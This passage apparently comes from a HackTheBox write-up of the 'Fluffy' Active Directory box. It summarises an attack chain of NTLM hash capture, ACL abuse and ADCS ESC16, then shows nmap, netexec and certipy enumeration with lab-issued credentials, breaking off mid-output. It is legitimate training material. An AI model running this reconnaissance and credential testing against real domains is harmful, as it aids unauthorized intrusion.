Fluffy

Fluffy is an assume-breach Windows Active Directory challenge. I’ll start by exploiting CVE-2025-24071 / CVE-2025-24055, a vulnerability in how Windows handles library-ms files in zip archives, leading to authentication attempts to the attacker. I’ll get a NetNTLMv2 and crack it. From there, BloodHound data shows that this user has GenericWrite over some service accounts. I’ll abuse that to get a WinRM shell with one. From this user, I’ll exploit ESC16 in the ADCS environment to get a shell as Administrator.

Box Info

Name Fluffy Fluffy
Play on HackTheBox
Release Date 24 May 2025
Retire Date 20 Sep 2025
OS Windows Windows
Base Points Easy [20]
Rated Difficulty Rated difficulty for Fluffy
Radar Graph Radar chart for Fluffy
First Blood User 00:15:27snowscan
First Blood Root 00:51:06NLTE
Creators ruycr4ft
kavigihan
Scenario As is common in real life Windows pentests, you will start the Fluffy box with credentials for the following account:
j.fleischman / J0elTHEM4n1990!

Recon

Initial Scanning

nmap finds a bunch of open TCP ports:

oxdf@hacky$ nmap -p- --min-rate 10000 10.10.11.69
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-22 02:11 UTC
Nmap scan report for 10.10.11.69
Host is up (0.094s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
49672/tcp open  unknown
49685/tcp open  unknown
49701/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 13.46 seconds
oxdf@hacky$ nmap -p 53,88,139,389,445,464,593,636,3268,3269,5985 -vv -sCV 10.10.11.69
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-22 02:12 UTC
...[snip]...
Nmap scan report for 10.10.11.69
Host is up, received echo-reply ttl 127 (0.094s latency).
Scanned at 2025-05-22 02:12:31 UTC for 91s

PORT     STATE SERVICE       REASON          VERSION
53/tcp   open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp   open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-05-22 02:12:37Z)
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.fluffy.htb
| Issuer: commonName=fluffy-DC01-CA/domainComponent=fluffy
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-17T16:04:17
| Not valid after:  2026-04-17T16:04:17
| MD5:   2765:a68f:4883:dc6d:0969:5d0d:3666:c880
| SHA-1: 72f3:1d5f:e6f3:b8ab:6b0e:dd77:5414:0d0c:abfe:e681
| -----BEGIN CERTIFICATE-----
| MIIGJzCCBQ+gAwIBAgITUAAAAAJKRwEaLBjVaAAAAAAAAjANBgkqhkiG9w0BAQsF
...[snip]...
| 9r5Zuo/LdOGg/tqrZV8cNR/AusGMNslltUAYtK3HyjETE/REiQgwS9mBbQ==
|_-----END CERTIFICATE-----
|_ssl-date: 2025-05-22T02:14:01+00:00; 0s from scanner time.
445/tcp  open  microsoft-ds? syn-ack ttl 127
464/tcp  open  kpasswd5?     syn-ack ttl 127
593/tcp  open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-22T02:14:01+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.fluffy.htb
| Issuer: commonName=fluffy-DC01-CA/domainComponent=fluffy
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-17T16:04:17
| Not valid after:  2026-04-17T16:04:17
| MD5:   2765:a68f:4883:dc6d:0969:5d0d:3666:c880
| SHA-1: 72f3:1d5f:e6f3:b8ab:6b0e:dd77:5414:0d0c:abfe:e681
| -----BEGIN CERTIFICATE-----
| MIIGJzCCBQ+gAwIBAgITUAAAAAJKRwEaLBjVaAAAAAAAAjANBgkqhkiG9w0BAQsF
...[snip]...
| 9r5Zuo/LdOGg/tqrZV8cNR/AusGMNslltUAYtK3HyjETE/REiQgwS9mBbQ==
|_-----END CERTIFICATE-----
3268/tcp open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.fluffy.htb
| Issuer: commonName=fluffy-DC01-CA/domainComponent=fluffy
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-17T16:04:17
| Not valid after:  2026-04-17T16:04:17
| MD5:   2765:a68f:4883:dc6d:0969:5d0d:3666:c880
| SHA-1: 72f3:1d5f:e6f3:b8ab:6b0e:dd77:5414:0d0c:abfe:e681
| -----BEGIN CERTIFICATE-----
| MIIGJzCCBQ+gAwIBAgITUAAAAAJKRwEaLBjVaAAAAAAAAjANBgkqhkiG9w0BAQsF
...[snip]...
| 9r5Zuo/LdOGg/tqrZV8cNR/AusGMNslltUAYtK3HyjETE/REiQgwS9mBbQ==
|_-----END CERTIFICATE-----
|_ssl-date: 2025-05-22T02:14:01+00:00; 0s from scanner time.
3269/tcp open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-22T02:14:01+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.fluffy.htb
| Issuer: commonName=fluffy-DC01-CA/domainComponent=fluffy
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-17T16:04:17
| Not valid after:  2026-04-17T16:04:17
| MD5:   2765:a68f:4883:dc6d:0969:5d0d:3666:c880
| SHA-1: 72f3:1d5f:e6f3:b8ab:6b0e:dd77:5414:0d0c:abfe:e681
| -----BEGIN CERTIFICATE-----
| MIIGJzCCBQ+gAwIBAgITUAAAAAJKRwEaLBjVaAAAAAAAAjANBgkqhkiG9w0BAQsF
...[snip]...
| 9r5Zuo/LdOGg/tqrZV8cNR/AusGMNslltUAYtK3HyjETE/REiQgwS9mBbQ==
|_-----END CERTIFICATE-----
5985/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 53865/tcp): CLEAN (Timeout)
|   Check 2 (port 19123/tcp): CLEAN (Timeout)
|   Check 3 (port 5751/udp): CLEAN (Timeout)
|   Check 4 (port 54887/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2025-05-22T02:13:21
|_  start_date: N/A
...[snip]...
Nmap done: 1 IP address (1 host up) scanned in 91.60 seconds

The box shows many of the ports associated with a Windows Domain Controller. The domain is fluffy.htb, and the hostname is DC01.

I’ll use netexec to generate a hosts file:

oxdf@hacky$ netexec smb 10.10.11.69 --generate-hosts-file hosts
SMB         10.10.11.69     445    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False) 
oxdf@hacky$ cat hosts /etc/hosts | sponge /etc/hosts

Initial Credentials

HackTheBox provides the following scenario associated with Puppy:

As is common in real life Windows pentests, you will start the Fluffy box with credentials for the following account:
j.fleischman / J0elTHEM4n1990!

The creds do work:

oxdf@hacky$ netexec smb dc01.fluffy.htb -u j.fleischman -p 'J0elTHEM4n1990!'
SMB         10.10.11.69     445    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.69     445    DC01             [+] fluffy.htb\j.fleischman:J0elTHEM4n1990!

They also work for LDAP, but not WinRM (unsurprisingly):

oxdf@hacky$ netexec ldap dc01.fluffy.htb -u j.fleischman -p 'J0elTHEM4n1990!'
LDAP        10.10.11.69     389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb)
LDAP        10.10.11.69     389    DC01             [+] fluffy.htb\j.fleischman:J0elTHEM4n1990! 
oxdf@hacky$ netexec winrm dc01.fluffy.htb -u j.fleischman -p 'J0elTHEM4n1990!'
WINRM       10.10.11.69     5985   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) 
WINRM       10.10.11.69     5985   DC01             [-] fluffy.htb\j.fleischman:J0elTHEM4n1990!

Given that, I’ll want to prioritize things like:

  • SMB shares
  • Bloodhound (which includes most of the data from LDAP)
  • ADCS

ADCS

I’ll check if Fluffy is running ADCS using the netexec module:

oxdf@hacky$ netexec ldap dc01.fluffy.htb -u j.fleischman -p 'J0elTHEM4n1990!' -M adcs
LDAP        10.10.11.69     389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb)
LDAP        10.10.11.69     389    DC01             [+] fluffy.htb\j.fleischman:J0elTHEM4n1990! 
ADCS        10.10.11.69     389    DC01             [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS        10.10.11.69     389    DC01             Found PKI Enrollment Server: DC01.fluffy.htb
ADCS        10.10.11.69     389    DC01             Found CN: fluffy-DC01-CA

This shows that there is a certificate authority, and I’ll want to run certipy to look for vulnerabilities:

oxdf@hacky$ certipy find -u j.fleischman@fluffy.htb -p 'J0elTHEM4n1990!' -vulnerable -stdout
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 14 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'fluffy-DC01-CA' via RRP
[*] Successfully retrieved CA configuration for 'fluffy-DC01-CA'
[*] Checking web enrollment for CA 'fluffy-DC01-CA' @ 'DC01.fluffy.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : fluffy-DC01-CA
    DNS Name                            : DC01.fluffy.htb
    Certificate Subject                 : CN=fluffy-DC01-CA, DC=fluffy, DC=htb
    Certificate Serial Number           : 3670C4A715B864BB497F7CD72119B6F5
    Certificate Validity Start          : 2025-04-17 16:00:16+00:00
    Certificate Validity End            : 3024-04-17 16:11:16+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Disabled Extensions                 : 1.3.6.1.4.1.311.25.2
    Permissions
      Owner                             : FLUFFY.HTB\Administrators
      Access Rights
        ManageCa                        : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
                                          FLUFFY.HTB\Administrators
        ManageCertificates              : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
                                          FLUFFY.HTB\Administrators
        Enroll                          : FLUFFY.HTB\Cert Publishers
Certificate Templates                   : [!] Could not find any certificate templates

There’s nothing here that seems exploitable at this point. I’ll get a list of all the templates on the DC by removing the -vulnerable flag:

oxdf@hacky$ certipy find -u j.fleischman@fluffy.htb -p 'J0elTHEM4n1990!' -stdout
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 14 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'fluffy-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'fluffy-DC01-CA'
[*] Checking web enrollment for CA 'fluffy-DC01-CA' @ 'DC01.fluffy.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : fluffy-DC01-CA
    DNS Name                            : DC01.fluffy.htb
    Certificate Subject                 : CN=fluffy-DC01-CA, DC=fluffy, DC=htb
    Certificate Serial Number           : 3670C4A715B864BB497F7CD72119B6F5
    Certificate Validity Start          : 2025-04-17 16:00:16+00:00
    Certificate Validity End            : 3024-04-17 16:11:16+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Disabled Extensions                 : 1.3.6.1.4.1.311.25.2
    Permissions
      Owner                             : FLUFFY.HTB\Administrators
      Access Rights
        ManageCa                        : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
                                          FLUFFY.HTB\Administrators
        ManageCertificates              : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
                                          FLUFFY.HTB\Administrators
        Enroll                          : FLUFFY.HTB\Cert Publishers
Certificate Templates
  0
    Template Name                       : KerberosAuthentication
    Display Name                        : Kerberos Authentication
    Certificate Authorities             : fluffy-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireDomainDns
                                          SubjectAltRequireDns
    Enrollment Flag                     : AutoEnrollment
    Extended Key Usage                  : Client Authentication
                                          Server Authentication
                                          Smart Card Logon
                                          KDC Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-04-17T16:10:16+00:00
    Template Last Modified              : 2025-04-17T16:10:16+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : FLUFFY.HTB\Enterprise Read-only Domain Controllers
                                          FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Domain Controllers
                                          FLUFFY.HTB\Enterprise Admins
                                          FLUFFY.HTB\Enterprise Domain Controllers
      Object Control Permissions
        Owner                           : FLUFFY.HTB\Enterprise Admins
        Full Control Principals         : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Owner Principals          : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Dacl Principals           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Property Enroll           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Domain Controllers
                                          FLUFFY.HTB\Enterprise Admins
                                          FLUFFY.HTB\Enterprise Domain Controllers
        Write Property AutoEnroll       : FLUFFY.HTB\Domain Controllers
                                          FLUFFY.HTB\Enterprise Domain Controllers
  1
    Template Name                       : OCSPResponseSigning
    Display Name                        : OCSP Response Signing
    Enabled                             : False
    Client Authentication               : False
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireDns
                                          SubjectRequireDnsAsCn
    Enrollment Flag                     : AddOcspNocheck
                                          Norevocationinfoinissuedcerts
    Extended Key Usage                  : OCSP Signing
    Requires Manager Approval           : False
    Requires Key Archival               : False
    RA Application Policies             : msPKI-Asymmetric-Algorithm`PZPWSTR`RSA`msPKI-Hash-Algorithm`PZPWSTR`SHA1`msPKI-Key-Security-Descriptor`PZPWSTR`D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;GR;;;S-1-5-80-3804348527-3718992918-2141599610-3686422417-2726379419)`msPKI-Key-Usage`DWORD`2`
    Authorized Signatures Required      : 0
    Schema Version                      : 3
    Validity Period                     : 2 weeks
    Renewal Period                      : 2 days
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-04-17T16:10:16+00:00
    Template Last Modified              : 2025-04-17T16:10:16+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : FLUFFY.HTB\Enterprise Admins
        Full Control Principals         : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Owner Principals          : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Dacl Principals           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Property Enroll           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
  2
    Template Name                       : RASAndIASServer
    Display Name                        : RAS and IAS Server
    Enabled                             : False
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireDns
                                          SubjectRequireCommonName
    Enrollment Flag                     : AutoEnrollment
    Extended Key Usage                  : Client Authentication
                                          Server Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-04-17T16:10:16+00:00
    Template Last Modified              : 2025-04-17T16:10:16+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
                                          FLUFFY.HTB\RAS and IAS Servers
      Object Control Permissions
        Owner                           : FLUFFY.HTB\Enterprise Admins
        Full Control Principals         : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Owner Principals          : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Dacl Principals           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Property Enroll           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
                                          FLUFFY.HTB\RAS and IAS Servers
  3
    Template Name                       : Workstation
    Display Name                        : Workstation Authentication
    Enabled                             : False
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireDns
    Enrollment Flag                     : AutoEnrollment
    Extended Key Usage                  : Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-04-17T16:10:16+00:00
    Template Last Modified              : 2025-04-17T16:10:16+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Domain Computers
                                          FLUFFY.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : FLUFFY.HTB\Enterprise Admins
        Full Control Principals         : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Owner Principals          : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Dacl Principals           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Property Enroll           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Domain Computers
                                          FLUFFY.HTB\Enterprise Admins
  4
    Template Name                       : DirectoryEmailReplication
    Display Name                        : Directory Email Replication
    Certificate Authorities             : fluffy-DC01-CA
    Enabled                             : True
    Client Authentication               : False
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireDirectoryGuid
                                          SubjectAltRequireDns
    Enrollment Flag                     : IncludeSymmetricAlgorithms
                                          PublishToDs
                                          AutoEnrollment
    Extended Key Usage                  : Directory Service Email Replication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-04-17T16:10:16+00:00
    Template Last Modified              : 2025-04-17T16:10:16+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : FLUFFY.HTB\Enterprise Read-only Domain Controllers
                                          FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Domain Controllers
                                          FLUFFY.HTB\Enterprise Admins
                                          FLUFFY.HTB\Enterprise Domain Controllers
      Object Control Permissions
        Owner                           : FLUFFY.HTB\Enterprise Admins
        Full Control Principals         : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Owner Principals          : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Dacl Principals           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Property Enroll           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Domain Controllers
                                          FLUFFY.HTB\Enterprise Admins
                                          FLUFFY.HTB\Enterprise Domain Controllers
        Write Property AutoEnroll       : FLUFFY.HTB\Domain Controllers
                                          FLUFFY.HTB\Enterprise Domain Controllers
  5
    Template Name                       : DomainControllerAuthentication
    Display Name                        : Domain Controller Authentication
    Certificate Authorities             : fluffy-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireDns
    Enrollment Flag                     : AutoEnrollment
    Extended Key Usage                  : Client Authentication
                                          Server Authentication
                                          Smart Card Logon
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-04-17T16:10:16+00:00
    Template Last Modified              : 2025-04-17T16:10:16+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : FLUFFY.HTB\Enterprise Read-only Domain Controllers
                                          FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Domain Controllers
                                          FLUFFY.HTB\Enterprise Admins
                                          FLUFFY.HTB\Enterprise Domain Controllers
      Object Control Permissions
        Owner                           : FLUFFY.HTB\Enterprise Admins
        Full Control Principals         : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Owner Principals          : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Dacl Principals           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Property Enroll           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Domain Controllers
                                          FLUFFY.HTB\Enterprise Admins
                                          FLUFFY.HTB\Enterprise Domain Controllers
        Write Property AutoEnroll       : FLUFFY.HTB\Domain Controllers
                                          FLUFFY.HTB\Enterprise Domain Controllers
  6
    Template Name                       : KeyRecoveryAgent
    Display Name                        : Key Recovery Agent
    Enabled                             : False
    Client Authentication               : False
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireUpn
                                          SubjectRequireDirectoryPath
    Enrollment Flag                     : IncludeSymmetricAlgorithms
                                          PendAllRequests
                                          PublishToKraContainer
                                          AutoEnrollment
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Key Recovery Agent
    Requires Manager Approval           : True
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 2 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-04-17T16:10:16+00:00
    Template Last Modified              : 2025-04-17T16:10:16+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : FLUFFY.HTB\Enterprise Admins
        Full Control Principals         : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Owner Principals          : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Dacl Principals           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Property Enroll           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
  7
    Template Name                       : CAExchange
    Display Name                        : CA Exchange
    Enabled                             : False
    Client Authentication               : False
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : IncludeSymmetricAlgorithms
    Extended Key Usage                  : Private Key Archival
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 1 week
    Renewal Period                      : 1 day
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-04-17T16:10:16+00:00
    Template Last Modified              : 2025-04-17T16:10:16+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : FLUFFY.HTB\Enterprise Admins
        Full Control Principals         : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Owner Principals          : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Dacl Principals           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Property Enroll           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
  8
    Template Name                       : CrossCA
    Display Name                        : Cross Certification Authority
    Enabled                             : False
    Client Authentication               : True
    Enrollment Agent                    : True
    Any Purpose                         : True
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : PublishToDs
    Private Key Flag                    : ExportableKey
    Requires Manager Approval           : False
    Requires Key Archival               : False
    RA Application Policies             : Qualified Subordination
    Authorized Signatures Required      : 1
    Schema Version                      : 2
    Validity Period                     : 5 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-04-17T16:10:16+00:00
    Template Last Modified              : 2025-04-17T16:10:16+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : FLUFFY.HTB\Enterprise Admins
        Full Control Principals         : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Owner Principals          : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Dacl Principals           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Property Enroll           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
  9
    Template Name                       : ExchangeUserSignature
    Display Name                        : Exchange Signature Only
    Enabled                             : False
    Client Authentication               : False
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Extended Key Usage                  : Secure Email
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-04-17T16:10:16+00:00
    Template Last Modified              : 2025-04-17T16:10:16+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : FLUFFY.HTB\Enterprise Admins
        Full Control Principals         : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Owner Principals          : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Dacl Principals           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
        Write Property Enroll           : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
  10
    Template Name                       : ExchangeUser
    Display Name                        : Exchange User
    Enabled                             : False
    Client Authentication               : False
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : IncludeSymmetricAlgorithms
    Private Key Flag                    : ExportableKey
